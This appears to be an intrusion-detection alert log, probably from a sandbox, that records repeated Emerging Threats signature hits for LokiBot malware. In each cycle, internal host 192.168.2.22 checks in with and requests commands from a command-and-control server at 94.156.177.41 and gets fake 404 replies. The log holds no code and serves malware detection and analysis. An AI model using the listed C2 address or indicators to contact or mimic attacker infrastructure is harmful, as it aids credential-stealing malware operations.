2024-11-20T10:12:22.167325+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49218	94.156.177.41	80	TCP
2024-11-20T10:12:22.175233+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49218	TCP
2024-11-20T10:12:22.394589+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49219	94.156.177.41	80	TCP
2024-11-20T10:12:22.394589+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49219	94.156.177.41	80	TCP
2024-11-20T10:12:22.394589+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49219	94.156.177.41	80	TCP
2024-11-20T10:12:23.270065+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49219	94.156.177.41	80	TCP
2024-11-20T10:12:23.270065+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49219	94.156.177.41	80	TCP
2024-11-20T10:12:23.277419+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49219	TCP
2024-11-20T10:12:23.419939+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49220	94.156.177.41	80	TCP
2024-11-20T10:12:23.419939+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49220	94.156.177.41	80	TCP
2024-11-20T10:12:23.419939+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49220	94.156.177.41	80	TCP
2024-11-20T10:12:24.148409+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49220	94.156.177.41	80	TCP
2024-11-20T10:12:24.148409+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49220	94.156.177.41	80	TCP
2024-11-20T10:12:24.155302+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49220	TCP
2024-11-20T10:12:24.307414+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49221	94.156.177.41	80	TCP
2024-11-20T10:12:24.307414+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49221	94.156.177.41	80	TCP
2024-11-20T10:12:24.307414+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49221	94.156.177.41	80	TCP
2024-11-20T10:12:25.196987+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49221	94.156.177.41	80	TCP
2024-11-20T10:12:25.196987+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49221	94.156.177.41	80	TCP
2024-11-20T10:12:25.204348+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49221	TCP
2024-11-20T10:12:25.356968+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49222	94.156.177.41	80	TCP
2024-11-20T10:12:25.356968+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49222	94.156.177.41	80	TCP
2024-11-20T10:12:25.356968+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49222	94.156.177.41	80	TCP
2024-11-20T10:12:26.119853+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49222	94.156.177.41	80	TCP
2024-11-20T10:12:26.119853+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49222	94.156.177.41	80	TCP
2024-11-20T10:12:26.125401+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49222	TCP
2024-11-20T10:12:26.273860+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49223	94.156.177.41	80	TCP
2024-11-20T10:12:26.273860+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49223	94.156.177.41	80	TCP
2024-11-20T10:12:26.273860+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49223	94.156.177.41	80	TCP
2024-11-20T10:12:27.018600+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49223	94.156.177.41	80	TCP
2024-11-20T10:12:27.018600+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49223	94.156.177.41	80	TCP
2024-11-20T10:12:27.026766+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49223	TCP
2024-11-20T10:12:27.165072+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49224	94.156.177.41	80	TCP
2024-11-20T10:12:27.165072+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49224	94.156.177.41	80	TCP
2024-11-20T10:12:27.165072+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49224	94.156.177.41	80	TCP
2024-11-20T10:12:27.971248+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49224	94.156.177.41	80	TCP
2024-11-20T10:12:27.971248+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49224	94.156.177.41	80	TCP
2024-11-20T10:12:27.977194+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49224	TCP
2024-11-20T10:12:28.110543+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49225	94.156.177.41	80	TCP
2024-11-20T10:12:28.110543+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49225	94.156.177.41	80	TCP
2024-11-20T10:12:28.110543+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49225	94.156.177.41	80	TCP
2024-11-20T10:12:28.855102+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49225	94.156.177.41	80	TCP
2024-11-20T10:12:28.855102+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49225	94.156.177.41	80	TCP
2024-11-20T10:12:28.862681+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49225	TCP
2024-11-20T10:12:28.999728+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49226	94.156.177.41	80	TCP
2024-11-20T10:12:28.999728+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49226	94.156.177.41	80	TCP
2024-11-20T10:12:28.999728+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49226	94.156.177.41	80	TCP
2024-11-20T10:12:29.827691+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49226	94.156.177.41	80	TCP
2024-11-20T10:12:29.827691+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49226	94.156.177.41	80	TCP
2024-11-20T10:12:29.833483+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49226	TCP
2024-11-20T10:12:29.966426+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49227	94.156.177.41	80	TCP
2024-11-20T10:12:29.966426+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49227	94.156.177.41	80	TCP
2024-11-20T10:12:29.966426+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49227	94.156.177.41	80	TCP
2024-11-20T10:12:30.830951+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49227	94.156.177.41	80	TCP
2024-11-20T10:12:30.830951+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49227	94.156.177.41	80	TCP
2024-11-20T10:12:30.836788+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49227	TCP
2024-11-20T10:12:30.982470+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49228	94.156.177.41	80	TCP
2024-11-20T10:12:30.982470+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49228	94.156.177.41	80	TCP
2024-11-20T10:12:30.982470+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49228	94.156.177.41	80	TCP
2024-11-20T10:12:31.861416+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49228	94.156.177.41	80	TCP
2024-11-20T10:12:31.861416+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49228	94.156.177.41	80	TCP
2024-11-20T10:12:31.866393+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49228	TCP
2024-11-20T10:12:32.023731+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49229	94.156.177.41	80	TCP
2024-11-20T10:12:32.023731+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49229	94.156.177.41	80	TCP
2024-11-20T10:12:32.023731+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49229	94.156.177.41	80	TCP
2024-11-20T10:12:32.777327+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49229	94.156.177.41	80	TCP
2024-11-20T10:12:32.777327+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49229	94.156.177.41	80	TCP
2024-11-20T10:12:32.804698+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49229	TCP
2024-11-20T10:12:32.972572+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49230	94.156.177.41	80	TCP
2024-11-20T10:12:32.972572+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49230	94.156.177.41	80	TCP
2024-11-20T10:12:32.972572+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49230	94.156.177.41	80	TCP
2024-11-20T10:12:33.728123+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49230	94.156.177.41	80	TCP
2024-11-20T10:12:33.728123+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49230	94.156.177.41	80	TCP
2024-11-20T10:12:33.734312+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49230	TCP
2024-11-20T10:12:33.892076+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49231	94.156.177.41	80	TCP
2024-11-20T10:12:33.892076+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49231	94.156.177.41	80	TCP
2024-11-20T10:12:33.892076+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49231	94.156.177.41	80	TCP
2024-11-20T10:12:34.632717+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49231	94.156.177.41	80	TCP
2024-11-20T10:12:34.632717+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49231	94.156.177.41	80	TCP
2024-11-20T10:12:34.652151+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49231	TCP
2024-11-20T10:12:34.777104+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49232	94.156.177.41	80	TCP
2024-11-20T10:12:34.777104+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49232	94.156.177.41	80	TCP
2024-11-20T10:12:34.777104+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49232	94.156.177.41	80	TCP
2024-11-20T10:12:35.505221+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49232	94.156.177.41	80	TCP
2024-11-20T10:12:35.505221+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49232	94.156.177.41	80	TCP
2024-11-20T10:12:35.510221+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49232	TCP
2024-11-20T10:12:35.645216+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49233	94.156.177.41	80	TCP
2024-11-20T10:12:35.645216+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49233	94.156.177.41	80	TCP
2024-11-20T10:12:35.645216+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49233	94.156.177.41	80	TCP
2024-11-20T10:12:36.376039+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49233	94.156.177.41	80	TCP
2024-11-20T10:12:36.376039+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49233	94.156.177.41	80	TCP
2024-11-20T10:12:36.382089+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49233	TCP
2024-11-20T10:12:36.520686+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49234	94.156.177.41	80	TCP
2024-11-20T10:12:36.520686+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49234	94.156.177.41	80	TCP
2024-11-20T10:12:36.520686+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49234	94.156.177.41	80	TCP
2024-11-20T10:12:37.246761+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49234	94.156.177.41	80	TCP
2024-11-20T10:12:37.246761+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49234	94.156.177.41	80	TCP
2024-11-20T10:12:37.254017+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49234	TCP
2024-11-20T10:12:37.391332+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49235	94.156.177.41	80	TCP
2024-11-20T10:12:37.391332+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49235	94.156.177.41	80	TCP
2024-11-20T10:12:37.391332+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49235	94.156.177.41	80	TCP
2024-11-20T10:12:38.148405+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49235	94.156.177.41	80	TCP
2024-11-20T10:12:38.148405+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49235	94.156.177.41	80	TCP
2024-11-20T10:12:38.156608+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49235	TCP
2024-11-20T10:12:38.295670+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49236	94.156.177.41	80	TCP
2024-11-20T10:12:38.295670+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49236	94.156.177.41	80	TCP
2024-11-20T10:12:38.295670+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49236	94.156.177.41	80	TCP
2024-11-20T10:12:39.034887+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49236	94.156.177.41	80	TCP
2024-11-20T10:12:39.034887+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49236	94.156.177.41	80	TCP
2024-11-20T10:12:39.040738+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49236	TCP
2024-11-20T10:12:39.189869+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49237	94.156.177.41	80	TCP
2024-11-20T10:12:39.189869+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49237	94.156.177.41	80	TCP
2024-11-20T10:12:39.189869+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49237	94.156.177.41	80	TCP
2024-11-20T10:12:40.082470+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49237	94.156.177.41	80	TCP
2024-11-20T10:12:40.082470+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49237	94.156.177.41	80	TCP
2024-11-20T10:12:40.087453+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49237	TCP
2024-11-20T10:12:40.238221+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49238	94.156.177.41	80	TCP
2024-11-20T10:12:40.238221+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49238	94.156.177.41	80	TCP
2024-11-20T10:12:40.238221+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49238	94.156.177.41	80	TCP
2024-11-20T10:12:40.998967+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49238	94.156.177.41	80	TCP
2024-11-20T10:12:40.998967+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49238	94.156.177.41	80	TCP
2024-11-20T10:12:41.006067+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49238	TCP
2024-11-20T10:12:41.149834+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49239	94.156.177.41	80	TCP
2024-11-20T10:12:41.149834+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49239	94.156.177.41	80	TCP
2024-11-20T10:12:41.149834+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49239	94.156.177.41	80	TCP
2024-11-20T10:12:41.926270+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49239	94.156.177.41	80	TCP
2024-11-20T10:12:41.926270+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49239	94.156.177.41	80	TCP
2024-11-20T10:12:41.933396+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49239	TCP
2024-11-20T10:12:42.075089+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49240	94.156.177.41	80	TCP
2024-11-20T10:12:42.075089+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49240	94.156.177.41	80	TCP
2024-11-20T10:12:42.075089+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49240	94.156.177.41	80	TCP
2024-11-20T10:12:42.940058+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49240	94.156.177.41	80	TCP
2024-11-20T10:12:42.940058+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49240	94.156.177.41	80	TCP
2024-11-20T10:12:42.947066+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49240	TCP
2024-11-20T10:12:43.090775+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49241	94.156.177.41	80	TCP
2024-11-20T10:12:43.090775+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49241	94.156.177.41	80	TCP
2024-11-20T10:12:43.090775+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49241	94.156.177.41	80	TCP
2024-11-20T10:12:43.960547+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49241	94.156.177.41	80	TCP
2024-11-20T10:12:43.960547+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49241	94.156.177.41	80	TCP
2024-11-20T10:12:43.965760+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49241	TCP
2024-11-20T10:12:44.335023+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49242	94.156.177.41	80	TCP
2024-11-20T10:12:44.335023+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49242	94.156.177.41	80	TCP
2024-11-20T10:12:44.335023+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49242	94.156.177.41	80	TCP
2024-11-20T10:12:45.163042+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49242	94.156.177.41	80	TCP
2024-11-20T10:12:45.163042+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49242	94.156.177.41	80	TCP
2024-11-20T10:12:45.167988+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49242	TCP
2024-11-20T10:12:45.306056+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49243	94.156.177.41	80	TCP
2024-11-20T10:12:45.306056+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49243	94.156.177.41	80	TCP
2024-11-20T10:12:45.306056+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49243	94.156.177.41	80	TCP
2024-11-20T10:12:46.061782+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49243	94.156.177.41	80	TCP
2024-11-20T10:12:46.061782+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49243	94.156.177.41	80	TCP
2024-11-20T10:12:46.066783+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49243	TCP
2024-11-20T10:12:46.228751+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49244	94.156.177.41	80	TCP
2024-11-20T10:12:46.228751+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49244	94.156.177.41	80	TCP
2024-11-20T10:12:46.228751+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49244	94.156.177.41	80	TCP
2024-11-20T10:12:46.952281+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49244	94.156.177.41	80	TCP
2024-11-20T10:12:46.952281+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49244	94.156.177.41	80	TCP
2024-11-20T10:12:46.968414+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49244	TCP
2024-11-20T10:12:47.301018+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49245	94.156.177.41	80	TCP
2024-11-20T10:12:47.301018+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49245	94.156.177.41	80	TCP
2024-11-20T10:12:47.301018+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49245	94.156.177.41	80	TCP
2024-11-20T10:12:48.035363+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49245	94.156.177.41	80	TCP
2024-11-20T10:12:48.035363+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49245	94.156.177.41	80	TCP
2024-11-20T10:12:48.042569+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49245	TCP
2024-11-20T10:12:48.198489+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49246	94.156.177.41	80	TCP
2024-11-20T10:12:48.198489+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49246	94.156.177.41	80	TCP
2024-11-20T10:12:48.198489+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49246	94.156.177.41	80	TCP
2024-11-20T10:12:48.943612+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49246	94.156.177.41	80	TCP
2024-11-20T10:12:48.943612+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49246	94.156.177.41	80	TCP
2024-11-20T10:12:48.948748+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49246	TCP
2024-11-20T10:12:49.104815+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49247	94.156.177.41	80	TCP
2024-11-20T10:12:49.104815+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49247	94.156.177.41	80	TCP
2024-11-20T10:12:49.104815+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49247	94.156.177.41	80	TCP
2024-11-20T10:12:50.033391+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49247	94.156.177.41	80	TCP
2024-11-20T10:12:50.033391+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49247	94.156.177.41	80	TCP
2024-11-20T10:12:50.039447+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49247	TCP
2024-11-20T10:12:50.259999+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49248	94.156.177.41	80	TCP
2024-11-20T10:12:50.259999+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49248	94.156.177.41	80	TCP
2024-11-20T10:12:50.259999+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49248	94.156.177.41	80	TCP
2024-11-20T10:12:50.995621+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49248	94.156.177.41	80	TCP
2024-11-20T10:12:50.995621+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49248	94.156.177.41	80	TCP
2024-11-20T10:12:51.002482+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49248	TCP
2024-11-20T10:12:51.135098+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49249	94.156.177.41	80	TCP
2024-11-20T10:12:51.135098+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49249	94.156.177.41	80	TCP
2024-11-20T10:12:51.135098+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49249	94.156.177.41	80	TCP
2024-11-20T10:12:51.871431+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49249	94.156.177.41	80	TCP
2024-11-20T10:12:51.871431+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49249	94.156.177.41	80	TCP
2024-11-20T10:12:51.895820+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49249	TCP
2024-11-20T10:12:52.064243+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49250	94.156.177.41	80	TCP
2024-11-20T10:12:52.064243+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49250	94.156.177.41	80	TCP
2024-11-20T10:12:52.064243+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49250	94.156.177.41	80	TCP
2024-11-20T10:12:52.935942+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49250	94.156.177.41	80	TCP
2024-11-20T10:12:52.935942+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49250	94.156.177.41	80	TCP
2024-11-20T10:12:52.945428+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49250	TCP
2024-11-20T10:12:53.190103+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49251	94.156.177.41	80	TCP
2024-11-20T10:12:53.190103+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49251	94.156.177.41	80	TCP
2024-11-20T10:12:53.190103+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49251	94.156.177.41	80	TCP
2024-11-20T10:12:54.054313+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49251	94.156.177.41	80	TCP
2024-11-20T10:12:54.054313+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49251	94.156.177.41	80	TCP
2024-11-20T10:12:54.059285+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49251	TCP
2024-11-20T10:12:54.198386+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49252	94.156.177.41	80	TCP
2024-11-20T10:12:54.198386+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49252	94.156.177.41	80	TCP
2024-11-20T10:12:54.198386+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49252	94.156.177.41	80	TCP
